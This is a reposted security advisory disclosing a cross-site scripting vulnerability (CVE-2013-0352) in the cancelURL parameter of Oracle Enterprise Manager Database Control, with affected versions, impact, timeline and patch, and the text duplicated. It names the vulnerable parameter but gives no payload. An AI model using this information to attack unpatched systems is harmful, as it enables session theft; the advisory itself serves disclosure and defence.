-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
TeamSHATTER Security Advisory
Oracle Enterprise Manager Cross Site Scripting in XDBResource cancelURL
parameter
February 20, 2013
Risk Level:
High
Affected versions:
Oracle Enterprise Manager Database Control 10.2.0.3, 10.2.0.4; 10.2.0.5,
11.1.0.7, 11.2.0.2, 11.2.0.3
Remote exploitable:
Yes
Credits:
This vulnerability was discovered and researched by Qinglin Jiang of
Application Security Inc.
Details:
Oracle Enterprise Manager Database Control XML Database Resources page is
vulnerable to a Cross-Site scripting vulnerability. An attacker may inject
malicious code into the web application and trick a legitimate user to execute
it by various methods. The malicious code generally appears in the form of a
script and will be executed in the context of the legitimate user. If a
legitimate user is in a trusted domain or has already been authenticated, the
malicous user may be able to steal session cookies to impersonate a legitimate
user and perform some illegal operations on the web application.
Impact:
Attackers might steal legitimate user's session cookies to impersonate a
legitimate user and perform illegal operations.
Vendor Status:
Vendor was contacted and a patch was released.
Workaround:
There is no workaround for this vulnerability.
Fix:
Apply January 2013 CPU.
CVE:
CVE-2013-0352
Links:
http://www.oracle.com/ technetwork/topics/security/ cpujan2013-1515902.html
https://www.teamshatter.com/? p=4125
Timeline:
Vendor Notification - 6/25/2012
Vendor Response - 6/29/2012
Fix - 1/15/2013
Public Disclosure - 2/20/2013
- --
______________________________ _______________
Copyright (c) 2013 Application Security, Inc.
http://www.appsecinc.com
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.11 (MingW32)
iEYEARECAAYFAlEmbNsACgkQRx91im nNIgEXXwCfXMTXf0nmulBLrzLiW7PJ 5oDF
8CgAoK1NSJ0yR1HAaRm/P8B53i3sU/ Om
=TB1N
-----END PGP SIGNATURE-----
Hash: SHA1
TeamSHATTER Security Advisory
Oracle Enterprise Manager Cross Site Scripting in XDBResource cancelURL
parameter
February 20, 2013
Risk Level:
High
Affected versions:
Oracle Enterprise Manager Database Control 10.2.0.3, 10.2.0.4; 10.2.0.5,
11.1.0.7, 11.2.0.2, 11.2.0.3
Remote exploitable:
Yes
Credits:
This vulnerability was discovered and researched by Qinglin Jiang of
Application Security Inc.
Details:
Oracle Enterprise Manager Database Control XML Database Resources page is
vulnerable to a Cross-Site scripting vulnerability. An attacker may inject
malicious code into the web application and trick a legitimate user to execute
it by various methods. The malicious code generally appears in the form of a
script and will be executed in the context of the legitimate user. If a
legitimate user is in a trusted domain or has already been authenticated, the
malicous user may be able to steal session cookies to impersonate a legitimate
user and perform some illegal operations on the web application.
Impact:
Attackers might steal legitimate user's session cookies to impersonate a
legitimate user and perform illegal operations.
Vendor Status:
Vendor was contacted and a patch was released.
Workaround:
There is no workaround for this vulnerability.
Fix:
Apply January 2013 CPU.
CVE:
CVE-2013-0352
Links:
http://www.oracle.com/
https://www.teamshatter.com/?
Timeline:
Vendor Notification - 6/25/2012
Vendor Response - 6/29/2012
Fix - 1/15/2013
Public Disclosure - 2/20/2013
- --
______________________________
Copyright (c) 2013 Application Security, Inc.
http://www.appsecinc.com
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.11 (MingW32)
iEYEARECAAYFAlEmbNsACgkQRx91im
8CgAoK1NSJ0yR1HAaRm/P8B53i3sU/
=TB1N
-----END PGP SIGNATURE-----
No comments:
Post a Comment